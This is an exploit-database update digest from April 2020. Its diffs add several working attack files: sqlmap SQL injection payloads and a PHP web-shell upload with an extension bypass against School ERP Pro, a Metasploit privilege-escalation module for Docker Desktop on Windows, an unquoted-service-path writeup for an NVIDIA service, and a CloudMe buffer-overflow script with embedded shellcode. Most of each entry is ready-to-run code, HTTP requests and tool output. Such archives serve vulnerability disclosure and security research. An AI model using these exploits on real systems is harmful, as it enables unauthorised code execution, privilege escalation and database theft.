DB: 2020-04-29

8 changes to exploits/shellcodes

Source Engine CS:GO BuildID: 4937372 - Arbitrary Code Execution
Docker-Credential-Wincred.exe - Privilege Escalation (Metasploit)
NVIDIA Update Service Daemon 1.0.21  - 'nvUpdatusService' Unquoted Service Path

CloudMe 1.11.2 - Buffer Overflow (PoC)
School ERP Pro 1.0 - 'es_messagesid' SQL Injection
School ERP Pro 1.0 - Remote Code Execution

exploits/macos/local/48387.txt

@@ -4,7 +4,7 @@
 # Vendor Homepage: https://www.valvesoftware.com/en/
 # Version: Source Engine, Tested on CS:GO BuildID: 4937372 TF2 BuildID: 4871679 Garry's Mod BuildID: 4803834 Half Life 2 BuildID: 4233302
 # Tested on: MacOS 15.3
-# CVE : N/A
+# CVE : CVE-2020-12242
 
 import os, random, sys
 banner = """

exploits/php/webapps/48390.txt

@@ -0,0 +1,44 @@
+# Exploit Title: School ERP Pro 1.0 - 'es_messagesid' SQL Injection
+# Date: 2020-04-28
+# Author: Besim ALTINOK
+# Vendor Homepage: http://arox.in
+# Software Link: https://sourceforge.net/projects/school-erp-ultimate/
+# Version: latest version
+# Tested on: Xampp
+# Credit: İsmail BOZKURT
+
+SQL Injection Detail
+--------------------------------
+*# Vulnerable parameter: es_messagesid*
+*# Vulnerable code:*
+
+if($action=="fullmessage_sent"){
+$msg_qry ="SELECT * FROM es_messages WHERE
+from_id=".$_SESSION['eschools']['user_id']." AND from_type='student' and
+es_messagesid=".*$es_messagesid;*
+$details_message=$db->getrow($msg_qry);
+}
+?>
+
+*Here is the SQLmap output:*
+*----------------------------------------*
+
+GET parameter '*es_messagesid*' is vulnerable.
+sqlmap identified the following injection point(s):
+---
+Parameter: es_messagesid (GET)
+Type: boolean-based blind
+Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
+Payload: pid=27&action=fullmessage_sent&es_messagesid=17 OR NOT
+6369=6369
+
+Type: UNION query
+Title: Generic UNION query (random number) - 12 columns
+Payload: pid=27&action=fullmessage_sent&es_messagesid=17 UNION ALL
+SELECT
+6194,6194,6194,6194,6194,6194,CONCAT(0x7162626b71,0x664750636f625866666c63425571426c5277516c49506c696f6548764c5a617977414d4849575a67,0x71707a7671),6194,6194,6194,6194,6194--
+-
+---
+[01:09:41] [INFO] testing MySQL
+[01:09:42] [INFO] confirming MySQL
+[01:09:44] [INFO] the back-end DBMS is MySQL

exploits/php/webapps/48392.txt

@@ -0,0 +1,103 @@
+# Exploit Title: School ERP Pro 1.0 - Remote Code Execution
+# Date: 2020-04-28
+# Author: Besim ALTINOK
+# Vendor Homepage: http://arox.in
+# Software Link: https://sourceforge.net/projects/school-erp-ultimate/
+# Version: latest version
+# Tested on: Xampp
+# Credit: İsmail BOZKURT
+
+Description
+-------------------------------------------
+A student can send a message to the admin. Additionally, with this method,
+the student can upload a PHP file to the system and run code in the system.
+
+------------------------------------
+*Vulnerable code - 1: (for student area) - sendmail.inc.php*
+- Student user can send message to admin with the attachment
+------------------------------------
+$image_file = basename($_FILES['newimage']['name'][$i]);
+$ext=explode(".",$_FILES['newimage']['name'][$i]);
+$str=date("mdY_hms");
+//$t=rand(1, 15);
+$new_thumbname = "$ext[0]".$str.$t.".".$ext[1];
+$updir = "images/messagedoc/";
+$dest_path = $updir.$new_thumbname;
+$up_images[$i] = $dest_path;
+$srcfile = $_FILES['newimage']['tmp_name'][$i];
+@move_uploaded_file($srcfile, $dest_path);
+$ins_arr_prod_images = array(
+'`es_messagesid`'  => $id,
+'`message_doc`'     => $new_thumbname
+);
+$idss=$db->insert("es_message_documents",$ins_arr_prod_images);
+
+---------------------------------------------------
+*PoC of the Remote Code Execution*
+---------------------------------------------------
+
+POST /erp/student_staff/index.php?pid=27&action=mailtoadmin HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 ***************************
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-GB,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer:
+http://localhost/erp/student_staff/index.php?pid=27&action=mailtoadmin
+Content-Type: multipart/form-data;
+boundary=---------------------------2104557667975595321153031663
+Content-Length: 718
+DNT: 1
+Connection: close
+Cookie: PHPSESSID=8a7cca1efcb3ff66502ed010172d497a; expandable=5c
+Upgrade-Insecure-Requests: 1
+
+-----------------------------2104557667975595321153031663
+Content-Disposition: form-data; name="subject"
+
+DEDED
+-----------------------------2104557667975595321153031663
+Content-Disposition: form-data; name="message"
+
+<p>DEDED</p>
+-----------------------------2104557667975595321153031663
+Content-Disposition: form-data; name="newimage[]"; filename="shell.php"
+Content-Type: text/php
+
+<?php phpinfo(); ?>
+
+-----------------------------2104557667975595321153031663
+Content-Disposition: form-data; name="filecount[]"
+
+1
+-----------------------------2104557667975595321153031663
+Content-Disposition: form-data; name="submit_staff"
+
+Send
+-----------------------------2104557667975595321153031663--
+
+
+------------------------------------
+*Vulnerable code - 2: (for admin area) - pre-editstudent.inc.php*
+- Admin user can update user profile photo
+------------------------------------
+if (is_uploaded_file($_FILES['pre_image']['tmp_name'])) {
+$ext = explode(".",$_FILES['pre_image']['name']);
+$str = date("mdY_hms");
+$new_thumbname = "st_".$str."_".$ext[0].".".$ext[1];
+$updir = "images/student_photos/";
+$uppath = $updir.$new_thumbname;
+move_uploaded_file($_FILES['pre_image']['tmp_name'],$uppath);
+$file = $new_thumbname;
+
+------------------------------------
+Bypass Technique:
+------------------------------------
+
+$_FILES['pre_image']['name']; --- > shell.php.png
+$ext = explode(".",$_FILES['pre_image']['name']);
+---
+$new_thumbname = "st_".$str."_".$ext[0].".".$ext[1];
+$ext[0] --> shell
+$ext[1] --> php
+lastfilename --> st_date_shell.php

exploits/windows/local/48388.rb

@@ -0,0 +1,108 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ManualRanking
+
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+  include Post::Windows::Priv
+  include Post::Windows::Runas
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Docker-Credential-Wincred.exe Privilege Escalation',
+        'Description' => %q{
+          This exploit leverages a vulnerability in docker desktop
+          community editions prior to 2.1.0.1 where an attacker can write
+          a payload to a lower-privileged area to be executed
+          automatically by the docker user at login.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Morgan Roman', # discovery
+          'bwatters-r7', # metasploit module
+        ],
+        'Platform' => ['win'],
+        'SessionTypes' => ['meterpreter'],
+        'Targets' => [[ 'Automatic', {} ]],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'WfsDelay' => 15
+        },
+        'DisclosureDate' => '2019-07-05',
+        'Notes' =>
+        {
+          'SideEffects' => [ ARTIFACTS_ON_DISK ]
+        },
+        'References' => [
+          ['CVE', '2019-15752'],
+          ['URL', 'https://medium.com/@morgan.henry.roman/elevation-of-privilege-in-docker-for-windows-2fd8450b478e']
+        ]
+      )
+    )
+    register_options(
+      [OptString.new('PROGRAMDATA', [true, 'Path to docker version-bin.', '%PROGRAMDATA%'])]
+    )
+  end
+
+  def docker_version
+    output = cmd_exec('cmd.exe', '/c docker -v')
+    vprint_status(output)
+    version_string = output.match(/(\d+\.)(\d+\.)(\d)/)[0]
+    Gem::Version.new(version_string.split('.').map(&:to_i).join('.'))
+  end
+
+  def check
+    if docker_version <= Gem::Version.new('18.09.0')
+      return CheckCode::Appears
+    end
+
+    CheckCode::Safe
+  end
+
+  def exploit
+    check_permissions!
+    case get_uac_level
+    when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,
+      UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP,
+      UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT
+      fail_with(Failure::NotVulnerable,
+                "UAC is set to 'Always Notify'. This module does not bypass this setting, exiting...")
+    when UAC_DEFAULT
+      print_good('UAC is set to Default')
+      print_good('BypassUAC can bypass this setting, continuing...')
+    when UAC_NO_PROMPT
+      print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead')
+      shell_execute_exe
+      return
+    end
+
+    # make payload
+    docker_path = expand_path("#{datastore['PROGRAMDATA']}\\DockerDesktop\\version-bin")
+    fail_with(Failure::NotFound, 'Vulnerable Docker path is not on system') unless directory?(docker_path)
+    payload_name = 'docker-credential-wincred.exe'
+    payload_pathname = "#{docker_path}\\#{payload_name}"
+    vprint_status('Making Payload')
+    payload = generate_payload_exe
+
+    # upload Payload
+    vprint_status("Uploading Payload to #{payload_pathname}")
+    write_file(payload_pathname, payload)
+    vprint_status('Payload Upload Complete')
+    print_status('Waiting for user to attempt to login')
+  end
+
+  def check_permissions!
+    unless check == Exploit::CheckCode::Appears
+      fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
+    end
+    fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?
+    # Check if you are an admin
+    # is_in_admin_group can be nil, true, or false
+  end
+end

exploits/windows/local/48391.txt

@@ -0,0 +1,36 @@
+# Exploit Title: NVIDIA Update Service Daemon 1.0.21  - 'nvUpdatusService' Unquoted Service Path
+# Discovery by: Roberto Piña
+# Discovery Date: 2020-04-27
+# Vendor Homepage: https://www.nvidia.com/es-la/
+# Software Link : https://www.nvidia.com/es-la/
+# Tested Version: 1.0.21
+# Vulnerability Type: Unquoted Service Path
+# Tested on OS: Windows 10 Pro x64 es
+
+# Step to discover Unquoted Service Path: 
+
+
+C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "NVIDIA" | findstr /i /v """
+NVIDIA Update Service Daemon                                                     nvUpdatusService                          C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Updatus\daemonu.exe                                                                          Auto
+
+C:\>sc qc nvUpdatusService
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: nvUpdatusService
+        TIPO               : 10  WIN32_OWN_PROCESS
+        TIPO_INICIO        : 2   AUTO_START  (DELAYED)
+        CONTROL_ERROR      : 1   NORMAL
+        NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Updatus\daemonu.exe
+        GRUPO_ORDEN_CARGA  :
+        ETIQUETA           : 0
+        NOMBRE_MOSTRAR     : NVIDIA Update Service Daemon
+        DEPENDENCIAS       :
+        NOMBRE_INICIO_SERVICIO: .\UpdatusUser
+
+C:\>
+
+#Exploit:
+# A successful attempt would require the local user to be able to insert their code in the system root path 
+# undetected by the OS or other security applications where it could potentially be executed during 
+# application startup or reboot. If successful, the local user's code would execute with the elevated 
+# privileges of the application.

exploits/windows/remote/48389.py

@@ -0,0 +1,48 @@
+# Exploit Title: CloudMe 1.11.2 - Buffer Overflow (PoC)
+# Date: 2020-04-27
+# Exploit Author: Andy Bowden
+# Vendor Homepage: https://www.cloudme.com/en
+# Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe
+# Version: CloudMe 1.11.2
+# Tested on: Windows 10 x86
+
+#Instructions:
+# Start the CloudMe service and run the script.
+
+import socket
+
+target = "127.0.0.1"
+
+padding1   = b"\x90" * 1052
+EIP        = b"\xB5\x42\xA8\x68" # 0x68A842B5 -> PUSH ESP, RET
+NOPS       = b"\x90" * 30
+
+#msfvenom -a x86 -p windows/exec CMD=calc.exe -b '\x00\x0A\x0D' -f python
+payload    = b"\xba\xad\x1e\x7c\x02\xdb\xcf\xd9\x74\x24\xf4\x5e\x33"
+payload   += b"\xc9\xb1\x31\x83\xc6\x04\x31\x56\x0f\x03\x56\xa2\xfc"
+payload   += b"\x89\xfe\x54\x82\x72\xff\xa4\xe3\xfb\x1a\x95\x23\x9f"
+payload   += b"\x6f\x85\x93\xeb\x22\x29\x5f\xb9\xd6\xba\x2d\x16\xd8"
+payload   += b"\x0b\x9b\x40\xd7\x8c\xb0\xb1\x76\x0e\xcb\xe5\x58\x2f"
+payload   += b"\x04\xf8\x99\x68\x79\xf1\xc8\x21\xf5\xa4\xfc\x46\x43"
+payload   += b"\x75\x76\x14\x45\xfd\x6b\xec\x64\x2c\x3a\x67\x3f\xee"
+payload   += b"\xbc\xa4\x4b\xa7\xa6\xa9\x76\x71\x5c\x19\x0c\x80\xb4"
+payload   += b"\x50\xed\x2f\xf9\x5d\x1c\x31\x3d\x59\xff\x44\x37\x9a"
+payload   += b"\x82\x5e\x8c\xe1\x58\xea\x17\x41\x2a\x4c\xfc\x70\xff"
+payload   += b"\x0b\x77\x7e\xb4\x58\xdf\x62\x4b\x8c\x6b\x9e\xc0\x33"
+payload   += b"\xbc\x17\x92\x17\x18\x7c\x40\x39\x39\xd8\x27\x46\x59"
+payload   += b"\x83\x98\xe2\x11\x29\xcc\x9e\x7b\x27\x13\x2c\x06\x05"
+payload   += b"\x13\x2e\x09\x39\x7c\x1f\x82\xd6\xfb\xa0\x41\x93\xf4"
+payload   += b"\xea\xc8\xb5\x9c\xb2\x98\x84\xc0\x44\x77\xca\xfc\xc6"
+payload   += b"\x72\xb2\xfa\xd7\xf6\xb7\x47\x50\xea\xc5\xd8\x35\x0c"
+payload   += b"\x7a\xd8\x1f\x6f\x1d\x4a\xc3\x5e\xb8\xea\x66\x9f"
+
+overrun    = b"C" * (1500 - len(padding1 + NOPS + EIP + payload))	
+
+buf = padding1 + EIP + NOPS + payload + overrun 
+
+try:
+	s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+	s.connect((target,8888))
+	s.send(buf)
+except Exception as e:
+	print(sys.exc_value)

files_exploits.csv

@@ -11039,7 +11039,9 @@ id,file,description,date,author,type,platform,port
 48359,exploits/solaris/local/48359.c,"Oracle Solaris Common Desktop Environment 1.6 - Local Privilege Escalation",2020-04-21,"Marco Ivaldi",local,solaris,
 48364,exploits/windows/local/48364.py,"RM Downloader 3.1.3.2.2010.06.13 - 'Load' Buffer Overflow (SEH)",2020-04-22,"Felipe Winsnes",local,windows,
 48378,exploits/windows/local/48378.txt,"Popcorn Time 6.2 - 'Update service' Unquoted Service Path",2020-04-24,"Uriel Yochpaz",local,windows,
-48387,exploits/windows/local/48387.txt,"Source Engine CS:GO BuildID: 4937372 - Arbitrary Code Execution",2020-04-27,0xEmma,local,windows,
+48387,exploits/macos/local/48387.txt,"Source Engine CS:GO BuildID: 4937372 - Arbitrary Code Execution",2020-04-27,0xEmma,local,macos,
+48388,exploits/windows/local/48388.rb,"Docker-Credential-Wincred.exe - Privilege Escalation (Metasploit)",2020-04-28,Metasploit,local,windows,
+48391,exploits/windows/local/48391.txt,"NVIDIA Update Service Daemon 1.0.21  - 'nvUpdatusService' Unquoted Service Path",2020-04-28,"Roberto Piña",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -18113,6 +18115,7 @@ id,file,description,date,author,type,platform,port
 48343,exploits/linux/remote/48343.rb,"Nexus Repository Manager - Java EL Injection RCE (Metasploit)",2020-04-17,Metasploit,remote,linux,
 48353,exploits/linux/remote/48353.rb,"Unraid 6.8.0 - Auth Bypass PHP Code Execution (Metasploit)",2020-04-20,Metasploit,remote,linux,
 48363,exploits/windows/remote/48363.py,"Neowise CarbonFTP 1.4 - Insecure Proprietary Password Encryption",2020-04-21,hyp3rlinx,remote,windows,
+48389,exploits/windows/remote/48389.py,"CloudMe 1.11.2 - Buffer Overflow (PoC)",2020-04-28,"Andy Bowden",remote,windows,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -42622,3 +42625,5 @@ id,file,description,date,author,type,platform,port
 48384,exploits/hardware/webapps/48384.txt,"Netis E1+ V1.2.32533 - Unauthenticated WiFi Password Leak",2020-04-27,Besim,webapps,hardware,
 48385,exploits/php/webapps/48385.txt,"Online Course Registration 2.0 - Authentication Bypass",2020-04-27,"Daniel Monzón",webapps,php,
 48386,exploits/php/webapps/48386.txt,"Maian Support Helpdesk 4.3 - Cross-Site Request Forgery (Add Admin)",2020-04-27,Besim,webapps,php,
+48390,exploits/php/webapps/48390.txt,"School ERP Pro 1.0 - 'es_messagesid' SQL Injection",2020-04-28,Besim,webapps,php,
+48392,exploits/php/webapps/48392.txt,"School ERP Pro 1.0 - Remote Code Execution",2020-04-28,Besim,webapps,php,